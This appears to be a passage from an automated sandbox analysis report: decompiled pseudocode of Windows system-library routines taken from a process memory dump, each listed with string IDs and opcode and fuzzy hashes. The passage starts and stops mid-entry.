                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                          						if(_t84 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t110 = 0;
                                                          						_t106 = 0;
                                                          						while(1) {
                                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                          							 *(_t118 - 0x88) = _t106;
                                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                          								break;
                                                          							}
                                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                          							_t106 = _t106 + 1;
                                                          						}
                                                          						_t88 = E0113500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                          						_t119 = _t119 + 0x1c;
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                          						if(_t88 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t101 = _t118 - 0x3c;
                                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                          						goto L21;
                                                          					}
                                                          					_t67 = 0xc0000017;
                                                          					goto L28;
                                                          				}
                                                          				_push(0);
                                                          				_push(0x20);
                                                          				_push(_t118 - 0x60);
                                                          				_push(0x5a);
                                                          				_t94 = E010F9860();
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                          				if(_t94 < 0) {
                                                          					goto L29;
                                                          				}
                                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                          					_t101 = L"Legacy";
                                                          					_push(6);
                                                          				} else {
                                                          					_t101 = L"UEFI";
                                                          					_push(4);
                                                          				}
                                                          				_pop(_t65);
                                                          				goto L21;
                                                          			}























                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                          • Instruction ID: bb510a83412911ba654c978ae5fe5b71eb590f6e7dd4469b2c62aa1a96218713
                                                          • Opcode Fuzzy Hash: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                          • Instruction Fuzzy Hash: FD517C71E04609DFDB68DFA8C990BAEBBF9FB88B00F14402DE649EB255D7719900CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E010DB944(signed int* __ecx, char __edx) {
                                                          				signed int _v8;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				char _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				intOrPtr _v44;
                                                          				signed int* _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				intOrPtr _v76;
                                                          				char _v77;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t68;
                                                          				char* _t73;
                                                          				intOrPtr _t77;
                                                          				intOrPtr _t78;
                                                          				signed int _t82;
                                                          				intOrPtr _t83;
                                                          				void* _t87;
                                                          				char _t88;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr _t91;
                                                          				void* _t97;
                                                          				intOrPtr _t100;
                                                          				void* _t102;
                                                          				void* _t107;
                                                          				signed int _t108;
                                                          				intOrPtr* _t112;
                                                          				void* _t113;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t116;
                                                          				intOrPtr _t117;
                                                          				signed int _t118;
                                                          				void* _t130;
                                                          
                                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                          				_v8 =  *0x11ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                          				_t112 = __ecx;
                                                          				_v77 = __edx;
                                                          				_v48 = __ecx;
                                                          				_v28 = 0;
                                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                                          				_t105 =  *_t5;
                                                          				_v20 = 0;
                                                          				_v16 = 0;
                                                          				if(_t105 == 0) {
                                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                                          					_t60 =  *__ecx |  *_t50;
                                                          					if(( *__ecx |  *_t50) != 0) {
                                                          						 *__ecx = 0;
                                                          						__ecx[1] = 0;
                                                          						if(E010D7D50() != 0) {
                                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                          						} else {
                                                          							_t65 = 0x7ffe0386;
                                                          						}
                                                          						if( *_t65 != 0) {
                                                          							E01188CD6(_t112);
                                                          						}
                                                          						_push(0);
                                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                                          						_push( *_t52);
                                                          						_t60 = E010F9E20();
                                                          					}
                                                          					L20:
                                                          					_pop(_t107);
                                                          					_pop(_t113);
                                                          					_pop(_t87);
                                                          					return E010FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                          				}
                                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                                          				_t67 =  *_t8;
                                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                          				_t108 =  *(_t67 + 0x14);
                                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                          				_t105 = 0x2710;
                                                          				asm("sbb eax, edi");
                                                          				_v44 = _t88;
                                                          				_v52 = _t108;
                                                          				_t60 = E010FCE00(_t97, _t68, 0x2710, 0);
                                                          				_v56 = _t60;
                                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                          					L3:
                                                          					 *(_t112 + 0x44) = _t60;
                                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                                          					 *_t112 = _t88;
                                                          					 *(_t112 + 4) = _t108;
                                                          					_v20 = _t60 * 0x2710;
                                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                                          					if(_v77 != 0) {
                                                          						L16:
                                                          						_v36 = _t88;
                                                          						_v32 = _t108;
                                                          						if(E010D7D50() != 0) {
                                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                          						} else {
                                                          							_t73 = 0x7ffe0386;
                                                          						}
                                                          						if( *_t73 != 0) {
                                                          							_t105 = _v40;
                                                          							E01188F6A(_t112, _v40, _t88, _t108);
                                                          						}
                                                          						_push( &_v28);
                                                          						_push(0);
                                                          						_push( &_v36);
                                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                                          						_push( *_t48);
                                                          						_t60 = E010FAF60();
                                                          						goto L20;
                                                          					} else {
                                                          						_t89 = 0x7ffe03b0;
                                                          						do {
                                                          							_t114 = 0x7ffe0010;
                                                          							do {
                                                          								_t77 =  *0x11a8628; // 0x0
                                                          								_v68 = _t77;
                                                          								_t78 =  *0x11a862c; // 0x0
                                                          								_v64 = _t78;
                                                          								_v72 =  *_t89;
                                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                          								while(1) {
                                                          									_t105 =  *0x7ffe000c;
                                                          									_t100 =  *0x7ffe0008;
                                                          									if(_t105 ==  *_t114) {
                                                          										goto L8;
                                                          									}
                                                          									asm("pause");
                                                          								}
                                                          								L8:
                                                          								_t89 = 0x7ffe03b0;
                                                          								_t115 =  *0x7ffe03b0;
                                                          								_t82 =  *0x7FFE03B4;
                                                          								_v60 = _t115;
                                                          								_t114 = 0x7ffe0010;
                                                          								_v56 = _t82;
                                                          							} while (_v72 != _t115 || _v76 != _t82);
                                                          							_t83 =  *0x11a8628; // 0x0
                                                          							_t116 =  *0x11a862c; // 0x0
                                                          							_v76 = _t116;
                                                          							_t117 = _v68;
                                                          						} while (_t117 != _t83 || _v64 != _v76);
                                                          						asm("sbb edx, [esp+0x24]");
                                                          						_t102 = _t100 - _v60 - _t117;
                                                          						_t112 = _v48;
                                                          						_t91 = _v44;
                                                          						asm("sbb edx, eax");
                                                          						_t130 = _t105 - _v52;
                                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                          							_t88 = _t102 - _t91;
                                                          							asm("sbb edx, edi");
                                                          							_t108 = _t105;
                                                          						} else {
                                                          							_t88 = 0;
                                                          							_t108 = 0;
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          				} else {
                                                          					if( *(_t112 + 0x44) == _t60) {
                                                          						goto L20;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          			}

















































                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010DB9A5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 885266447-0
                                                          • Opcode ID: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                          • Instruction ID: 221897eb62ae8f374644b1f36e1bb63744a1a9748532fb2b8023e56d32f8c48e
                                                          • Opcode Fuzzy Hash: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                          • Instruction Fuzzy Hash: 10515571A08341CFC724DF2DC08092ABBE5BB89610F56896EFAD987345DB70E844CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E010BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                          				signed int _t65;
                                                          				signed short _t69;
                                                          				intOrPtr _t70;
                                                          				signed short _t85;
                                                          				void* _t86;
                                                          				signed short _t89;
                                                          				signed short _t91;
                                                          				intOrPtr _t92;
                                                          				intOrPtr _t97;
                                                          				intOrPtr* _t98;
                                                          				signed short _t99;
                                                          				signed short _t101;
                                                          				void* _t102;
                                                          				char* _t103;
                                                          				signed short _t104;
                                                          				intOrPtr* _t110;
                                                          				void* _t111;
                                                          				void* _t114;
                                                          				intOrPtr* _t115;
                                                          
                                                          				_t109 = __esi;
                                                          				_t108 = __edi;
                                                          				_t106 = __edx;
                                                          				_t95 = __ebx;
                                                          				_push(0x90);
                                                          				_push(0x118f7a8);
                                                          				E0110D0E8(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                          				if(__edx == 0xffffffff) {
                                                          					L6:
                                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                          					__eflags = _t65 & 0x00000002;
                                                          					if((_t65 & 0x00000002) != 0) {
                                                          						L3:
                                                          						L4:
                                                          						return E0110D130(_t95, _t108, _t109);
                                                          					}
                                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                          					_t108 = 0;
                                                          					_t109 = 0;
                                                          					_t95 = 0;
                                                          					__eflags = 0;
                                                          					while(1) {
                                                          						__eflags = _t95 - 0x200;
                                                          						if(_t95 >= 0x200) {
                                                          							break;
                                                          						}
                                                          						E010FD000(0x80);
                                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                          						_t108 = _t115;
                                                          						_t95 = _t95 - 0xffffff80;
                                                          						_t17 = _t114 - 4;
                                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                          						__eflags =  *_t17;
                                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                          						_t102 = _t110 + 1;
                                                          						do {
                                                          							_t85 =  *_t110;
                                                          							_t110 = _t110 + 1;
                                                          							__eflags = _t85;
                                                          						} while (_t85 != 0);
                                                          						_t111 = _t110 - _t102;
                                                          						_t21 = _t95 - 1; // -129
                                                          						_t86 = _t21;
                                                          						__eflags = _t111 - _t86;
                                                          						if(_t111 > _t86) {
                                                          							_t111 = _t86;
                                                          						}
                                                          						E010FF3E0(_t108, _t106, _t111);
                                                          						_t115 = _t115 + 0xc;
                                                          						_t103 = _t111 + _t108;
                                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                          						_t89 = _t95 - _t111;
                                                          						__eflags = _t89;
                                                          						_push(0);
                                                          						if(_t89 == 0) {
                                                          							L15:
                                                          							_t109 = 0xc000000d;
                                                          							goto L16;
                                                          						} else {
                                                          							__eflags = _t89 - 0x7fffffff;
                                                          							if(_t89 <= 0x7fffffff) {
                                                          								L16:
                                                          								 *(_t114 - 0x94) = _t109;
                                                          								__eflags = _t109;
                                                          								if(_t109 < 0) {
                                                          									__eflags = _t89;
                                                          									if(_t89 != 0) {
                                                          										 *_t103 = 0;
                                                          									}
                                                          									L26:
                                                          									 *(_t114 - 0xa0) = _t109;
                                                          									 *(_t114 - 4) = 0xfffffffe;
                                                          									__eflags = _t109;
                                                          									if(_t109 >= 0) {
                                                          										L31:
                                                          										_t98 = _t108;
                                                          										_t39 = _t98 + 1; // 0x1
                                                          										_t106 = _t39;
                                                          										do {
                                                          											_t69 =  *_t98;
                                                          											_t98 = _t98 + 1;
                                                          											__eflags = _t69;
                                                          										} while (_t69 != 0);
                                                          										_t99 = _t98 - _t106;
                                                          										__eflags = _t99;
                                                          										L34:
                                                          										_t70 =  *[fs:0x30];
                                                          										__eflags =  *((char*)(_t70 + 2));
                                                          										if( *((char*)(_t70 + 2)) != 0) {
                                                          											L40:
                                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                          											 *(_t114 - 4) = 1;
                                                          											_push(_t114 - 0x74);
                                                          											L0110DEF0(_t99, _t106);
                                                          											 *(_t114 - 4) = 0xfffffffe;
                                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                          											goto L3;
                                                          										}
                                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                          											goto L40;
                                                          										}
                                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                          										_push(_t99 & 0x0000ffff);
                                                          										_push(_t108);
                                                          										_push(1);
                                                          										_t101 = E010FB280();
                                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                                          											__eflags = _t101 - 0x80000003;
                                                          											if(_t101 == 0x80000003) {
                                                          												E010FB7E0(1);
                                                          												_t101 = 0;
                                                          												__eflags = 0;
                                                          											}
                                                          										}
                                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                          										goto L4;
                                                          									}
                                                          									__eflags = _t109 - 0x80000005;
                                                          									if(_t109 == 0x80000005) {
                                                          										continue;
                                                          									}
                                                          									break;
                                                          								}
                                                          								 *(_t114 - 0x90) = 0;
                                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                          								_t91 = E010FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                          								_t115 = _t115 + 0x10;
                                                          								_t104 = _t91;
                                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                          								__eflags = _t104;
                                                          								if(_t104 < 0) {
                                                          									L21:
                                                          									_t109 = 0x80000005;
                                                          									 *(_t114 - 0x90) = 0x80000005;
                                                          									L22:
                                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                          									L23:
                                                          									 *(_t114 - 0x94) = _t109;
                                                          									goto L26;
                                                          								}
                                                          								__eflags = _t104 - _t92;
                                                          								if(__eflags > 0) {
                                                          									goto L21;
                                                          								}
                                                          								if(__eflags == 0) {
                                                          									goto L22;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					__eflags = _t109;
                                                          					if(_t109 >= 0) {
                                                          						goto L31;
                                                          					}
                                                          					__eflags = _t109 - 0x80000005;
                                                          					if(_t109 != 0x80000005) {
                                                          						goto L31;
                                                          					}
                                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                          					_t38 = _t95 - 1; // -129
                                                          					_t99 = _t38;
                                                          					goto L34;
                                                          				}
                                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                          					__eflags = __edx - 0x65;
                                                          					if(__edx != 0x65) {
                                                          						goto L2;
                                                          					}
                                                          					goto L6;
                                                          				}
                                                          				L2:
                                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                                          				_push(_t106);
                                                          				if(E010FA890() != 0) {
                                                          					goto L6;
                                                          				}
                                                          				goto L3;
                                                          			}






















                                                          0x01114958
                                                          0x01114959
                                                          0x01114959
                                                          0x0111495d
                                                          0x0111495d
                                                          0x0111495f
                                                          0x0111495f
                                                          0x01114965
                                                          0x01114969
                                                          0x011149ba
                                                          0x011149ba
                                                          0x011149c1
                                                          0x011149c5
                                                          0x011149cc
                                                          0x011149d4
                                                          0x011149d7
                                                          0x011149da
                                                          0x011149e4
                                                          0x011149e5
                                                          0x011149f3
                                                          0x01114a02
                                                          0x00000000
                                                          0x01114a02
                                                          0x01114972
                                                          0x01114974
                                                          0x00000000
                                                          0x00000000
                                                          0x01114976
                                                          0x01114979
                                                          0x01114982
                                                          0x01114983
                                                          0x01114984
                                                          0x0111498b
                                                          0x0111498d
                                                          0x01114991
                                                          0x01114993
                                                          0x01114999
                                                          0x0111499d
                                                          0x011149a2
                                                          0x011149a2
                                                          0x011149a2
                                                          0x01114999
                                                          0x011149ac
                                                          0x00000000
                                                          0x011149b3
                                                          0x011148f8
                                                          0x011148fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x011148fe
                                                          0x01114895
                                                          0x0111489c
                                                          0x011148ad
                                                          0x011148b2
                                                          0x011148b5
                                                          0x011148b7
                                                          0x011148ba
                                                          0x011148bc
                                                          0x011148c6
                                                          0x011148c6
                                                          0x011148cb
                                                          0x011148d1
                                                          0x011148d4
                                                          0x011148d8
                                                          0x011148d8
                                                          0x00000000
                                                          0x011148d8
                                                          0x011148be
                                                          0x011148c0
                                                          0x00000000
                                                          0x00000000
                                                          0x011148c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x011148c4
                                                          0x00000000
                                                          0x01114882
                                                          0x0111487b
                                                          0x01114904
                                                          0x01114906
                                                          0x00000000
                                                          0x00000000
                                                          0x01114908
                                                          0x0111490e
                                                          0x00000000
                                                          0x00000000
                                                          0x01114910
                                                          0x01114917
                                                          0x01114917
                                                          0x00000000
                                                          0x01114917
                                                          0x010bb1ba
                                                          0x011147f9
                                                          0x011147fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x011147fc
                                                          0x010bb1c0
                                                          0x010bb1c0
                                                          0x010bb1c3
                                                          0x010bb1cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: _vswprintf_s
                                                          • String ID:
                                                          • API String ID: 677850445-0
                                                          • Opcode ID: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47
                                                          • Instruction ID: d2f48aa4f59eecc71350ca58549a78c50c9a3d24f26a07fef2d96957423411c2
                                                          • Opcode Fuzzy Hash: 80562f494f45266f3b60def16d70441d7437499eb52d7599eea860a5905d0e47
                                                          • Instruction Fuzzy Hash: E651D371D002598FEF39CFA8C845BEEBBB1AF04B10F1041BDD999ABA86D7704941CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PATH
                                                          • API String ID: 0-1036084923
                                                          • Opcode ID: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272
                                                          • Instruction ID: 3b719aee70bf641647b35a18d862b68530dba4be48cbc441e8ac5c70561a1e2a
                                                          • Opcode Fuzzy Hash: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272
                                                          • Instruction Fuzzy Hash: 06C19FB1D40219DFDB29DF9AD885BEEBBF9FF48740F484029E581AB250D734A941CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0112BE0F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                          • API String ID: 0-865735534
                                                          • Opcode ID: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282
                                                          • Instruction ID: 1bd7925e9e67df613e5db5a0303cb181b294c9eda2c01934b9ac140638577c3a
                                                          • Opcode Fuzzy Hash: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282
                                                          • Instruction Fuzzy Hash: 06A13671B0061B8FEB29DB6AC454BBEB7E5AF44710F14457DDA86CB680EB30D841CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Re-Waiting
                                                          • API String ID: 0-316354757
                                                          • Opcode ID: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb
                                                          • Instruction ID: 35206f6f57e40f0af8b4faca13b607bd63b44c84a7dc101e8f59fc916d290602
                                                          • Opcode Fuzzy Hash: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb
                                                          • Instruction Fuzzy Hash: 11613531E00606DFDB3BDF6CC881BBE7BE5EB44714F1442A9E5A1972C1D7B4A9828781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce
                                                          • Instruction ID: 08d02a3b178210e44e769618cdb8ade1853aa9256f6e1fe1c053ecda90832b8f
                                                          • Opcode Fuzzy Hash: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce
                                                          • Instruction Fuzzy Hash: 955190713043429FD329EF28D880B5BBBE5EBC4714F14892CF69697290D771E806CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction ID: 2f4021fbefd29dc453461c440dfb24d811b1f9ce3c372c053b104794496b5b4d
                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction Fuzzy Hash: C1518D726047119FC320DF29C841AABBBF8FF58710F00892EFA9587690E7B4E914CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051
                                                          • Instruction ID: 750b2552a492c15d72081aa1ad34c1e3cc16ef2a4b771a7f491afc6e3ff51627
                                                          • Opcode Fuzzy Hash: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051
                                                          • Instruction Fuzzy Hash: 204132F2D1052D9FDB259A50CC81FDEB77CAB44718F0045A9EB19AB240DB309F888F98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                          • Instruction ID: 43321769f8e650023c748290e0d3931c33f5803490c92e98af51b6c93a1d91ea
                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                          • Instruction Fuzzy Hash: 5B3108322047096BE714EE18CC45F977BD9FBC8758F248125FA549B280D770E908CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931
                                                          • Instruction ID: b1e9cc8d969e1e230c5e945163a049c841180a83cc6ac5c6f0068c9018107c43
                                                          • Opcode Fuzzy Hash: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931
                                                          • Instruction Fuzzy Hash: 3D310532D0050AEFEB19DA58C945EABFB74FB80720F024169E964A7294E7309E00C7A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3
                                                          • Instruction ID: 627886823be226ebcdc821b03d06016cdad1f143ba5d7cc73fd85471d523244c
                                                          • Opcode Fuzzy Hash: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3
                                                          • Instruction Fuzzy Hash: 6D31DFB5508301AFC321DF69C984AAFBBE8FF89654F00492EF9D483650D634DD04CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WindowsExcludedProcs
                                                          • API String ID: 0-3583428290
                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction ID: 675c5b65396f80afdb14d9fac4380c6cc140278b267821bf1194a5d1173a5145
                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction Fuzzy Hash: 8A21F87A60021DEBDB22DB59D880F9FBBADAF45A50F054479FA448B205D630DD01CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx
                                                          • API String ID: 0-89312691
                                                          • Opcode ID: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42
                                                          • Instruction ID: 7706675add4666a432382643f69b5dacca7fe8b42eb2f6b77aa8a125938f933b
                                                          • Opcode Fuzzy Hash: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42
                                                          • Instruction Fuzzy Hash: 7611D034304B038BEBA94E1DC8907BA76D5BB85264F27C56AE5E7CB791DB70C8438340
                                                          Uniqueness

